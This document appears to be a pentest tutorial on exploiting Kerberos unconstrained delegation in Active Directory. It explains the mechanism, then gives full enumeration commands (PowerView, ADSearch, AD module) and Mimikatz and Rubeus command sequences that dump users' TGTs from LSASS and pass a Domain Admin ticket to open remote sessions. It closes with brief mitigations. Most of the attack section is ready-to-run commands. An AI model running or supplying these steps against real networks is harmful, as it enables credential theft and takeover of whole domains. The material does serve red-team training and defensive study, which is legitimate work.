Unconstrained delegation is a security feature or misconfiguration in Microsoft Active Directory (AD) that can be exploited by attackers to gain unauthorized access to resources within a network.

Occurs when a computer, such as a File Server, has the “Trust this computer for delegation to any service” option enabled, and a Domain Administrator logs into the File Server. This enables us to grab a copy of the Domain Administrator’s TGT, which can be used to authenticate anywhere in the Domain.

Anytime, a user login onto the Computer, a copy of the TGT of that user is going to be sent inside the TGS provided by the DC and saved in memory in LSASS. So, if you have Administrator privileges on the machine, you will be able to dump the tickets and impersonate the users on any machine.

Attackers can then advance their attacks against unconstrained delegation using PowerShell and Mimikatz commands. They can

Dump and reuse credentials out of LSASS.
Export all private certificates.
Escalate privileges to have debug rights on the remote computer.

So if a domain admin login inside a Computer with “Unconstrained Delegation” feature activated, and you have local admin privileges inside that machine, you will be able to dump the ticket and impersonate the Domain Admin anywhere (domain privesc).

What is Active Directory Delegation?

Delegation is an Active Directory feature for when a user or computer account needs to impersonate another account. For example, when a user calls a web application hosted on the web server, the application can impersonate the user credentials to access resources hosted on a different server, such as a database server. Any domain computers with unconstrained delegation enabled can impersonate user credentials to any service in the domain.

Type of Kerberos Delegation:

Unconstrained delegation
Constrained delegation
RBCD (Resource-Based Constrained Delegation)

A user Y requests a TGS for a service

The KDC checks to see if the TRUSTED_FOR_DELEGATION flag is enabled on user X and whether it belongs to the Protected Users group or has the NOT_DELEGATION flag.

In case you only have TRUSTED_FOR_DELEGATION, the KDC will include a TGT for user Y within the TGS for service X.

Finally, service X will receive the TGS and obtain the TGT from user Y.

Requirements

Elevated privileges on the host that is configured for Unconstrained Delegation.
Kerberos Authentication: The target environment should use Kerberos authentication.
Account has the TRUSTED_FOR_DELEGATION flag in the User Account Control (UAC) flags.
User account has not the NOT_DELEGATED flag set which by default non domain accounts have this flag.

Escalation_Vectors

Vertically, escalate privileges to a higher privileged user like Domain Admin.
Horizontally, obtain privileges to another user who has access to different resources within the network not accessible to the original compromised account.

Used Tools

Invoke-Mimikatz
PowerView
Active Directory Module

Identification

ADSearch

1. You can find Computer objects with this attribute checking if the userAccountControl attribute contains ADS_UF_TRUSTED_FOR_DELEGATION. You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does:

ADSearch.exe –search “(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))” –attributes samaccountname,dnshostname,operatingsystem

PowerView

1. DCs always appear but aren’t useful for privesc

Get-NetComputer -Unconstrained
Get-NetComputer -Unconstrained | Select samaccountname

Get-ADComputer (AD Module)

1. Active directory module can also be used to enumerate delegations

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
Get-ADComputer “LAB-CLIENT-WIN1” -Properties TrustedForDelegation, TrustedToAuthForDelegation,msDS-AllowedToDelegateTo,PrincipalsAllowedToDelegateToAccount
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

Note:

Unconstrained Delegation: TrustedForDelegation = True
Constrained Delegation: TrustedToAuthForDelegation = True

2. Using the same module querying the “userAccountControl” attribute can provide the same results.

Get-ADComputer -LDAPFilter “(userAccountControl:1.2.840.113556.1.4.803:=524288)”

Get-ADComputer (AD Module)

1. Enumerate users that possess the TrustedForDelegation flag

Get-ADUser -Filter {TrustedForDelegation -eq $True}

Exploitation (Mimikatz)

1. Having access to a server with TRUSTED_FOR_DELEGATION flag, when a user requests access to a service, it could be a SMB service, or a website that needs access to a database, we can search for TGT tickets in memory, or we can capture the TGT ticket using Rubeus.exe. First, let’s try to search for tickets using mimikatz

Mimikatz.exe
privilege::debug
sekurlsa::tickets /export
- mimikatz.exe “token::elevate” “sekurlsa::tickets /export”
kerberos::list /export
- mimikatz.exe “token::elevate” “kerberos::list /export”

2. We found tickets, and, exported them.

Extra (Invoke-Mimikatz)

# Export tickets (Preferred Method (More Accurate))

Invoke-Mimikatz -Command ‘”token::elevate “sekurlsa::tickets /export”‘

# Alternative Method

Invoke-Mimikatz -Command ‘””token::elevate” “kerberos::list /export”‘

Mimikatz (Pass the ticket: PTT)

1. Having the ticket exported, proceed to load it

kerberos::ptt [0;3f2148]-2-0-60a10000-Administrator@krbtgt-VK9-SEC.COM.kirbi

2. List the tickets loaded

kerberos::list /export

3. Run a new CMD

misc::cmd
klist

Exploitation (Rubeus)

1. Look for any existing interesting ticket

.\Rubeus.exe triage

2. Monitor to see if there are any in coming tickets, from requests from any other service

.\Rubeus.exe monitor /interval:1
Rubeus.exe monitor /interval:15 /nowrap
Rubeus.exe monitor /interval:15 /nowrap /targetuser:administrator

Note: Grab the base64 ticket

(Alternative) 3. You can dump tickets for selected user,service or LUID

Rubeus.exe dump /nowrap /user:administrator
Rubeus.exe dump /nowrap /service:krbtgt
Rubeus.exe dump /nowrap /luid:0x6ee60

Extra (Invoke-Rubeus)

# Triage for existing tickets

Invoke-Rubeus -Command “triage”

# Dump tickets for selected user,service or LUID

Invoke-Rubeus -Command “dump /nowrap /user:administrator”
Invoke-Rubeus -Command “dump /nowrap /service:krbtgt”
Invoke-Rubeus -Command “dump /nowrap /luid:0x6ee60”

# Monitor for and dump new tickets

Invoke-Rubeus -Command “monitor interval:15 /nowrap”
Invoke-Rubeus -Command “monitor interval:15 /nowrap /targetuser:administrator”

Rubeus (Pass the ticket: PTT)

1. Having the ticket we can proceed to use pass the ticket technique

.\Rubeus.exe createnetonly /program:c:\windows\system32\cmd.exe /show
.\Rubeus.exe ptt /ticket:[Base64 ticket]
.\Rubeus.exe ptt /luid:[LUID from previous command] /ticket:[Base64 ticket]

2. You can list the PC cached tickets

klist

3. Once the ticket has been imported, you can start a remote session to the server

Enter-PSSession -ComputerName lab-win2019
hostname; whoami

Note:

For this demo I used this tool to simulate a service on the remote machine (https://github.com/leechristensen/SpoolSample)

Here we have the compiled version

https://github.com/jtmpu/PrecompiledBinaries

Mitigation

Identify all the servers that have delegation configured. Disable unconstrained Kerberos delegation and configure constrained delegation for servers that require it.
Enable the “Account is sensitive and cannot be delegated” setting for high privileged accounts.

Security admins should be more cautious of granting privileged permissions to users who can enable unconstrained Kerberos delegation. The option “Enable computer and user accounts to be trusted for delegation” is available under Security Settings >> Local Policies >> User Rights Assignment.
Adding user accounts to the Protected Users Security Group, available starting with Windows Server 2012 R2, can also mitigate unconstrained delegation exposure.